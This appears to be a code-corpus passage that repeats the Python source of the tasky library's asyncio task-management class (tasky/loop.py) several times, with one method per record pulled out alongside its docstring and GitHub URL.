One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.execute | python | async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn) | Execute an arbitrary function outside the event loop using
a shared Executor. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L134-L139 | null | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.run_forever | python | def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close() | Execute the tasky/asyncio event loop until terminated. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L141-L147 | [
"async def init(self) -> None:\n '''Initialize configuration and start tasks.'''\n\n self.stats = await self.insert(self.stats)\n self.configuration = await self.insert(self.configuration)\n\n if not self.executor:\n try:\n max_workers = self.config.get('executor_workers')\n exc... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.run_until_complete | python | def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close() | Execute the tasky/asyncio event loop until all tasks finish. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L149-L156 | [
"async def init(self) -> None:\n '''Initialize configuration and start tasks.'''\n\n self.stats = await self.insert(self.stats)\n self.configuration = await self.insert(self.configuration)\n\n if not self.executor:\n try:\n max_workers = self.config.get('executor_workers')\n exc... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.run_for_time | python | def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close() | Execute the tasky/asyncio event loop for `duration` seconds. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L158-L173 | [
"async def init(self) -> None:\n '''Initialize configuration and start tasks.'''\n\n self.stats = await self.insert(self.stats)\n self.configuration = await self.insert(self.configuration)\n\n if not self.executor:\n try:\n max_workers = self.config.get('executor_workers')\n exc... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
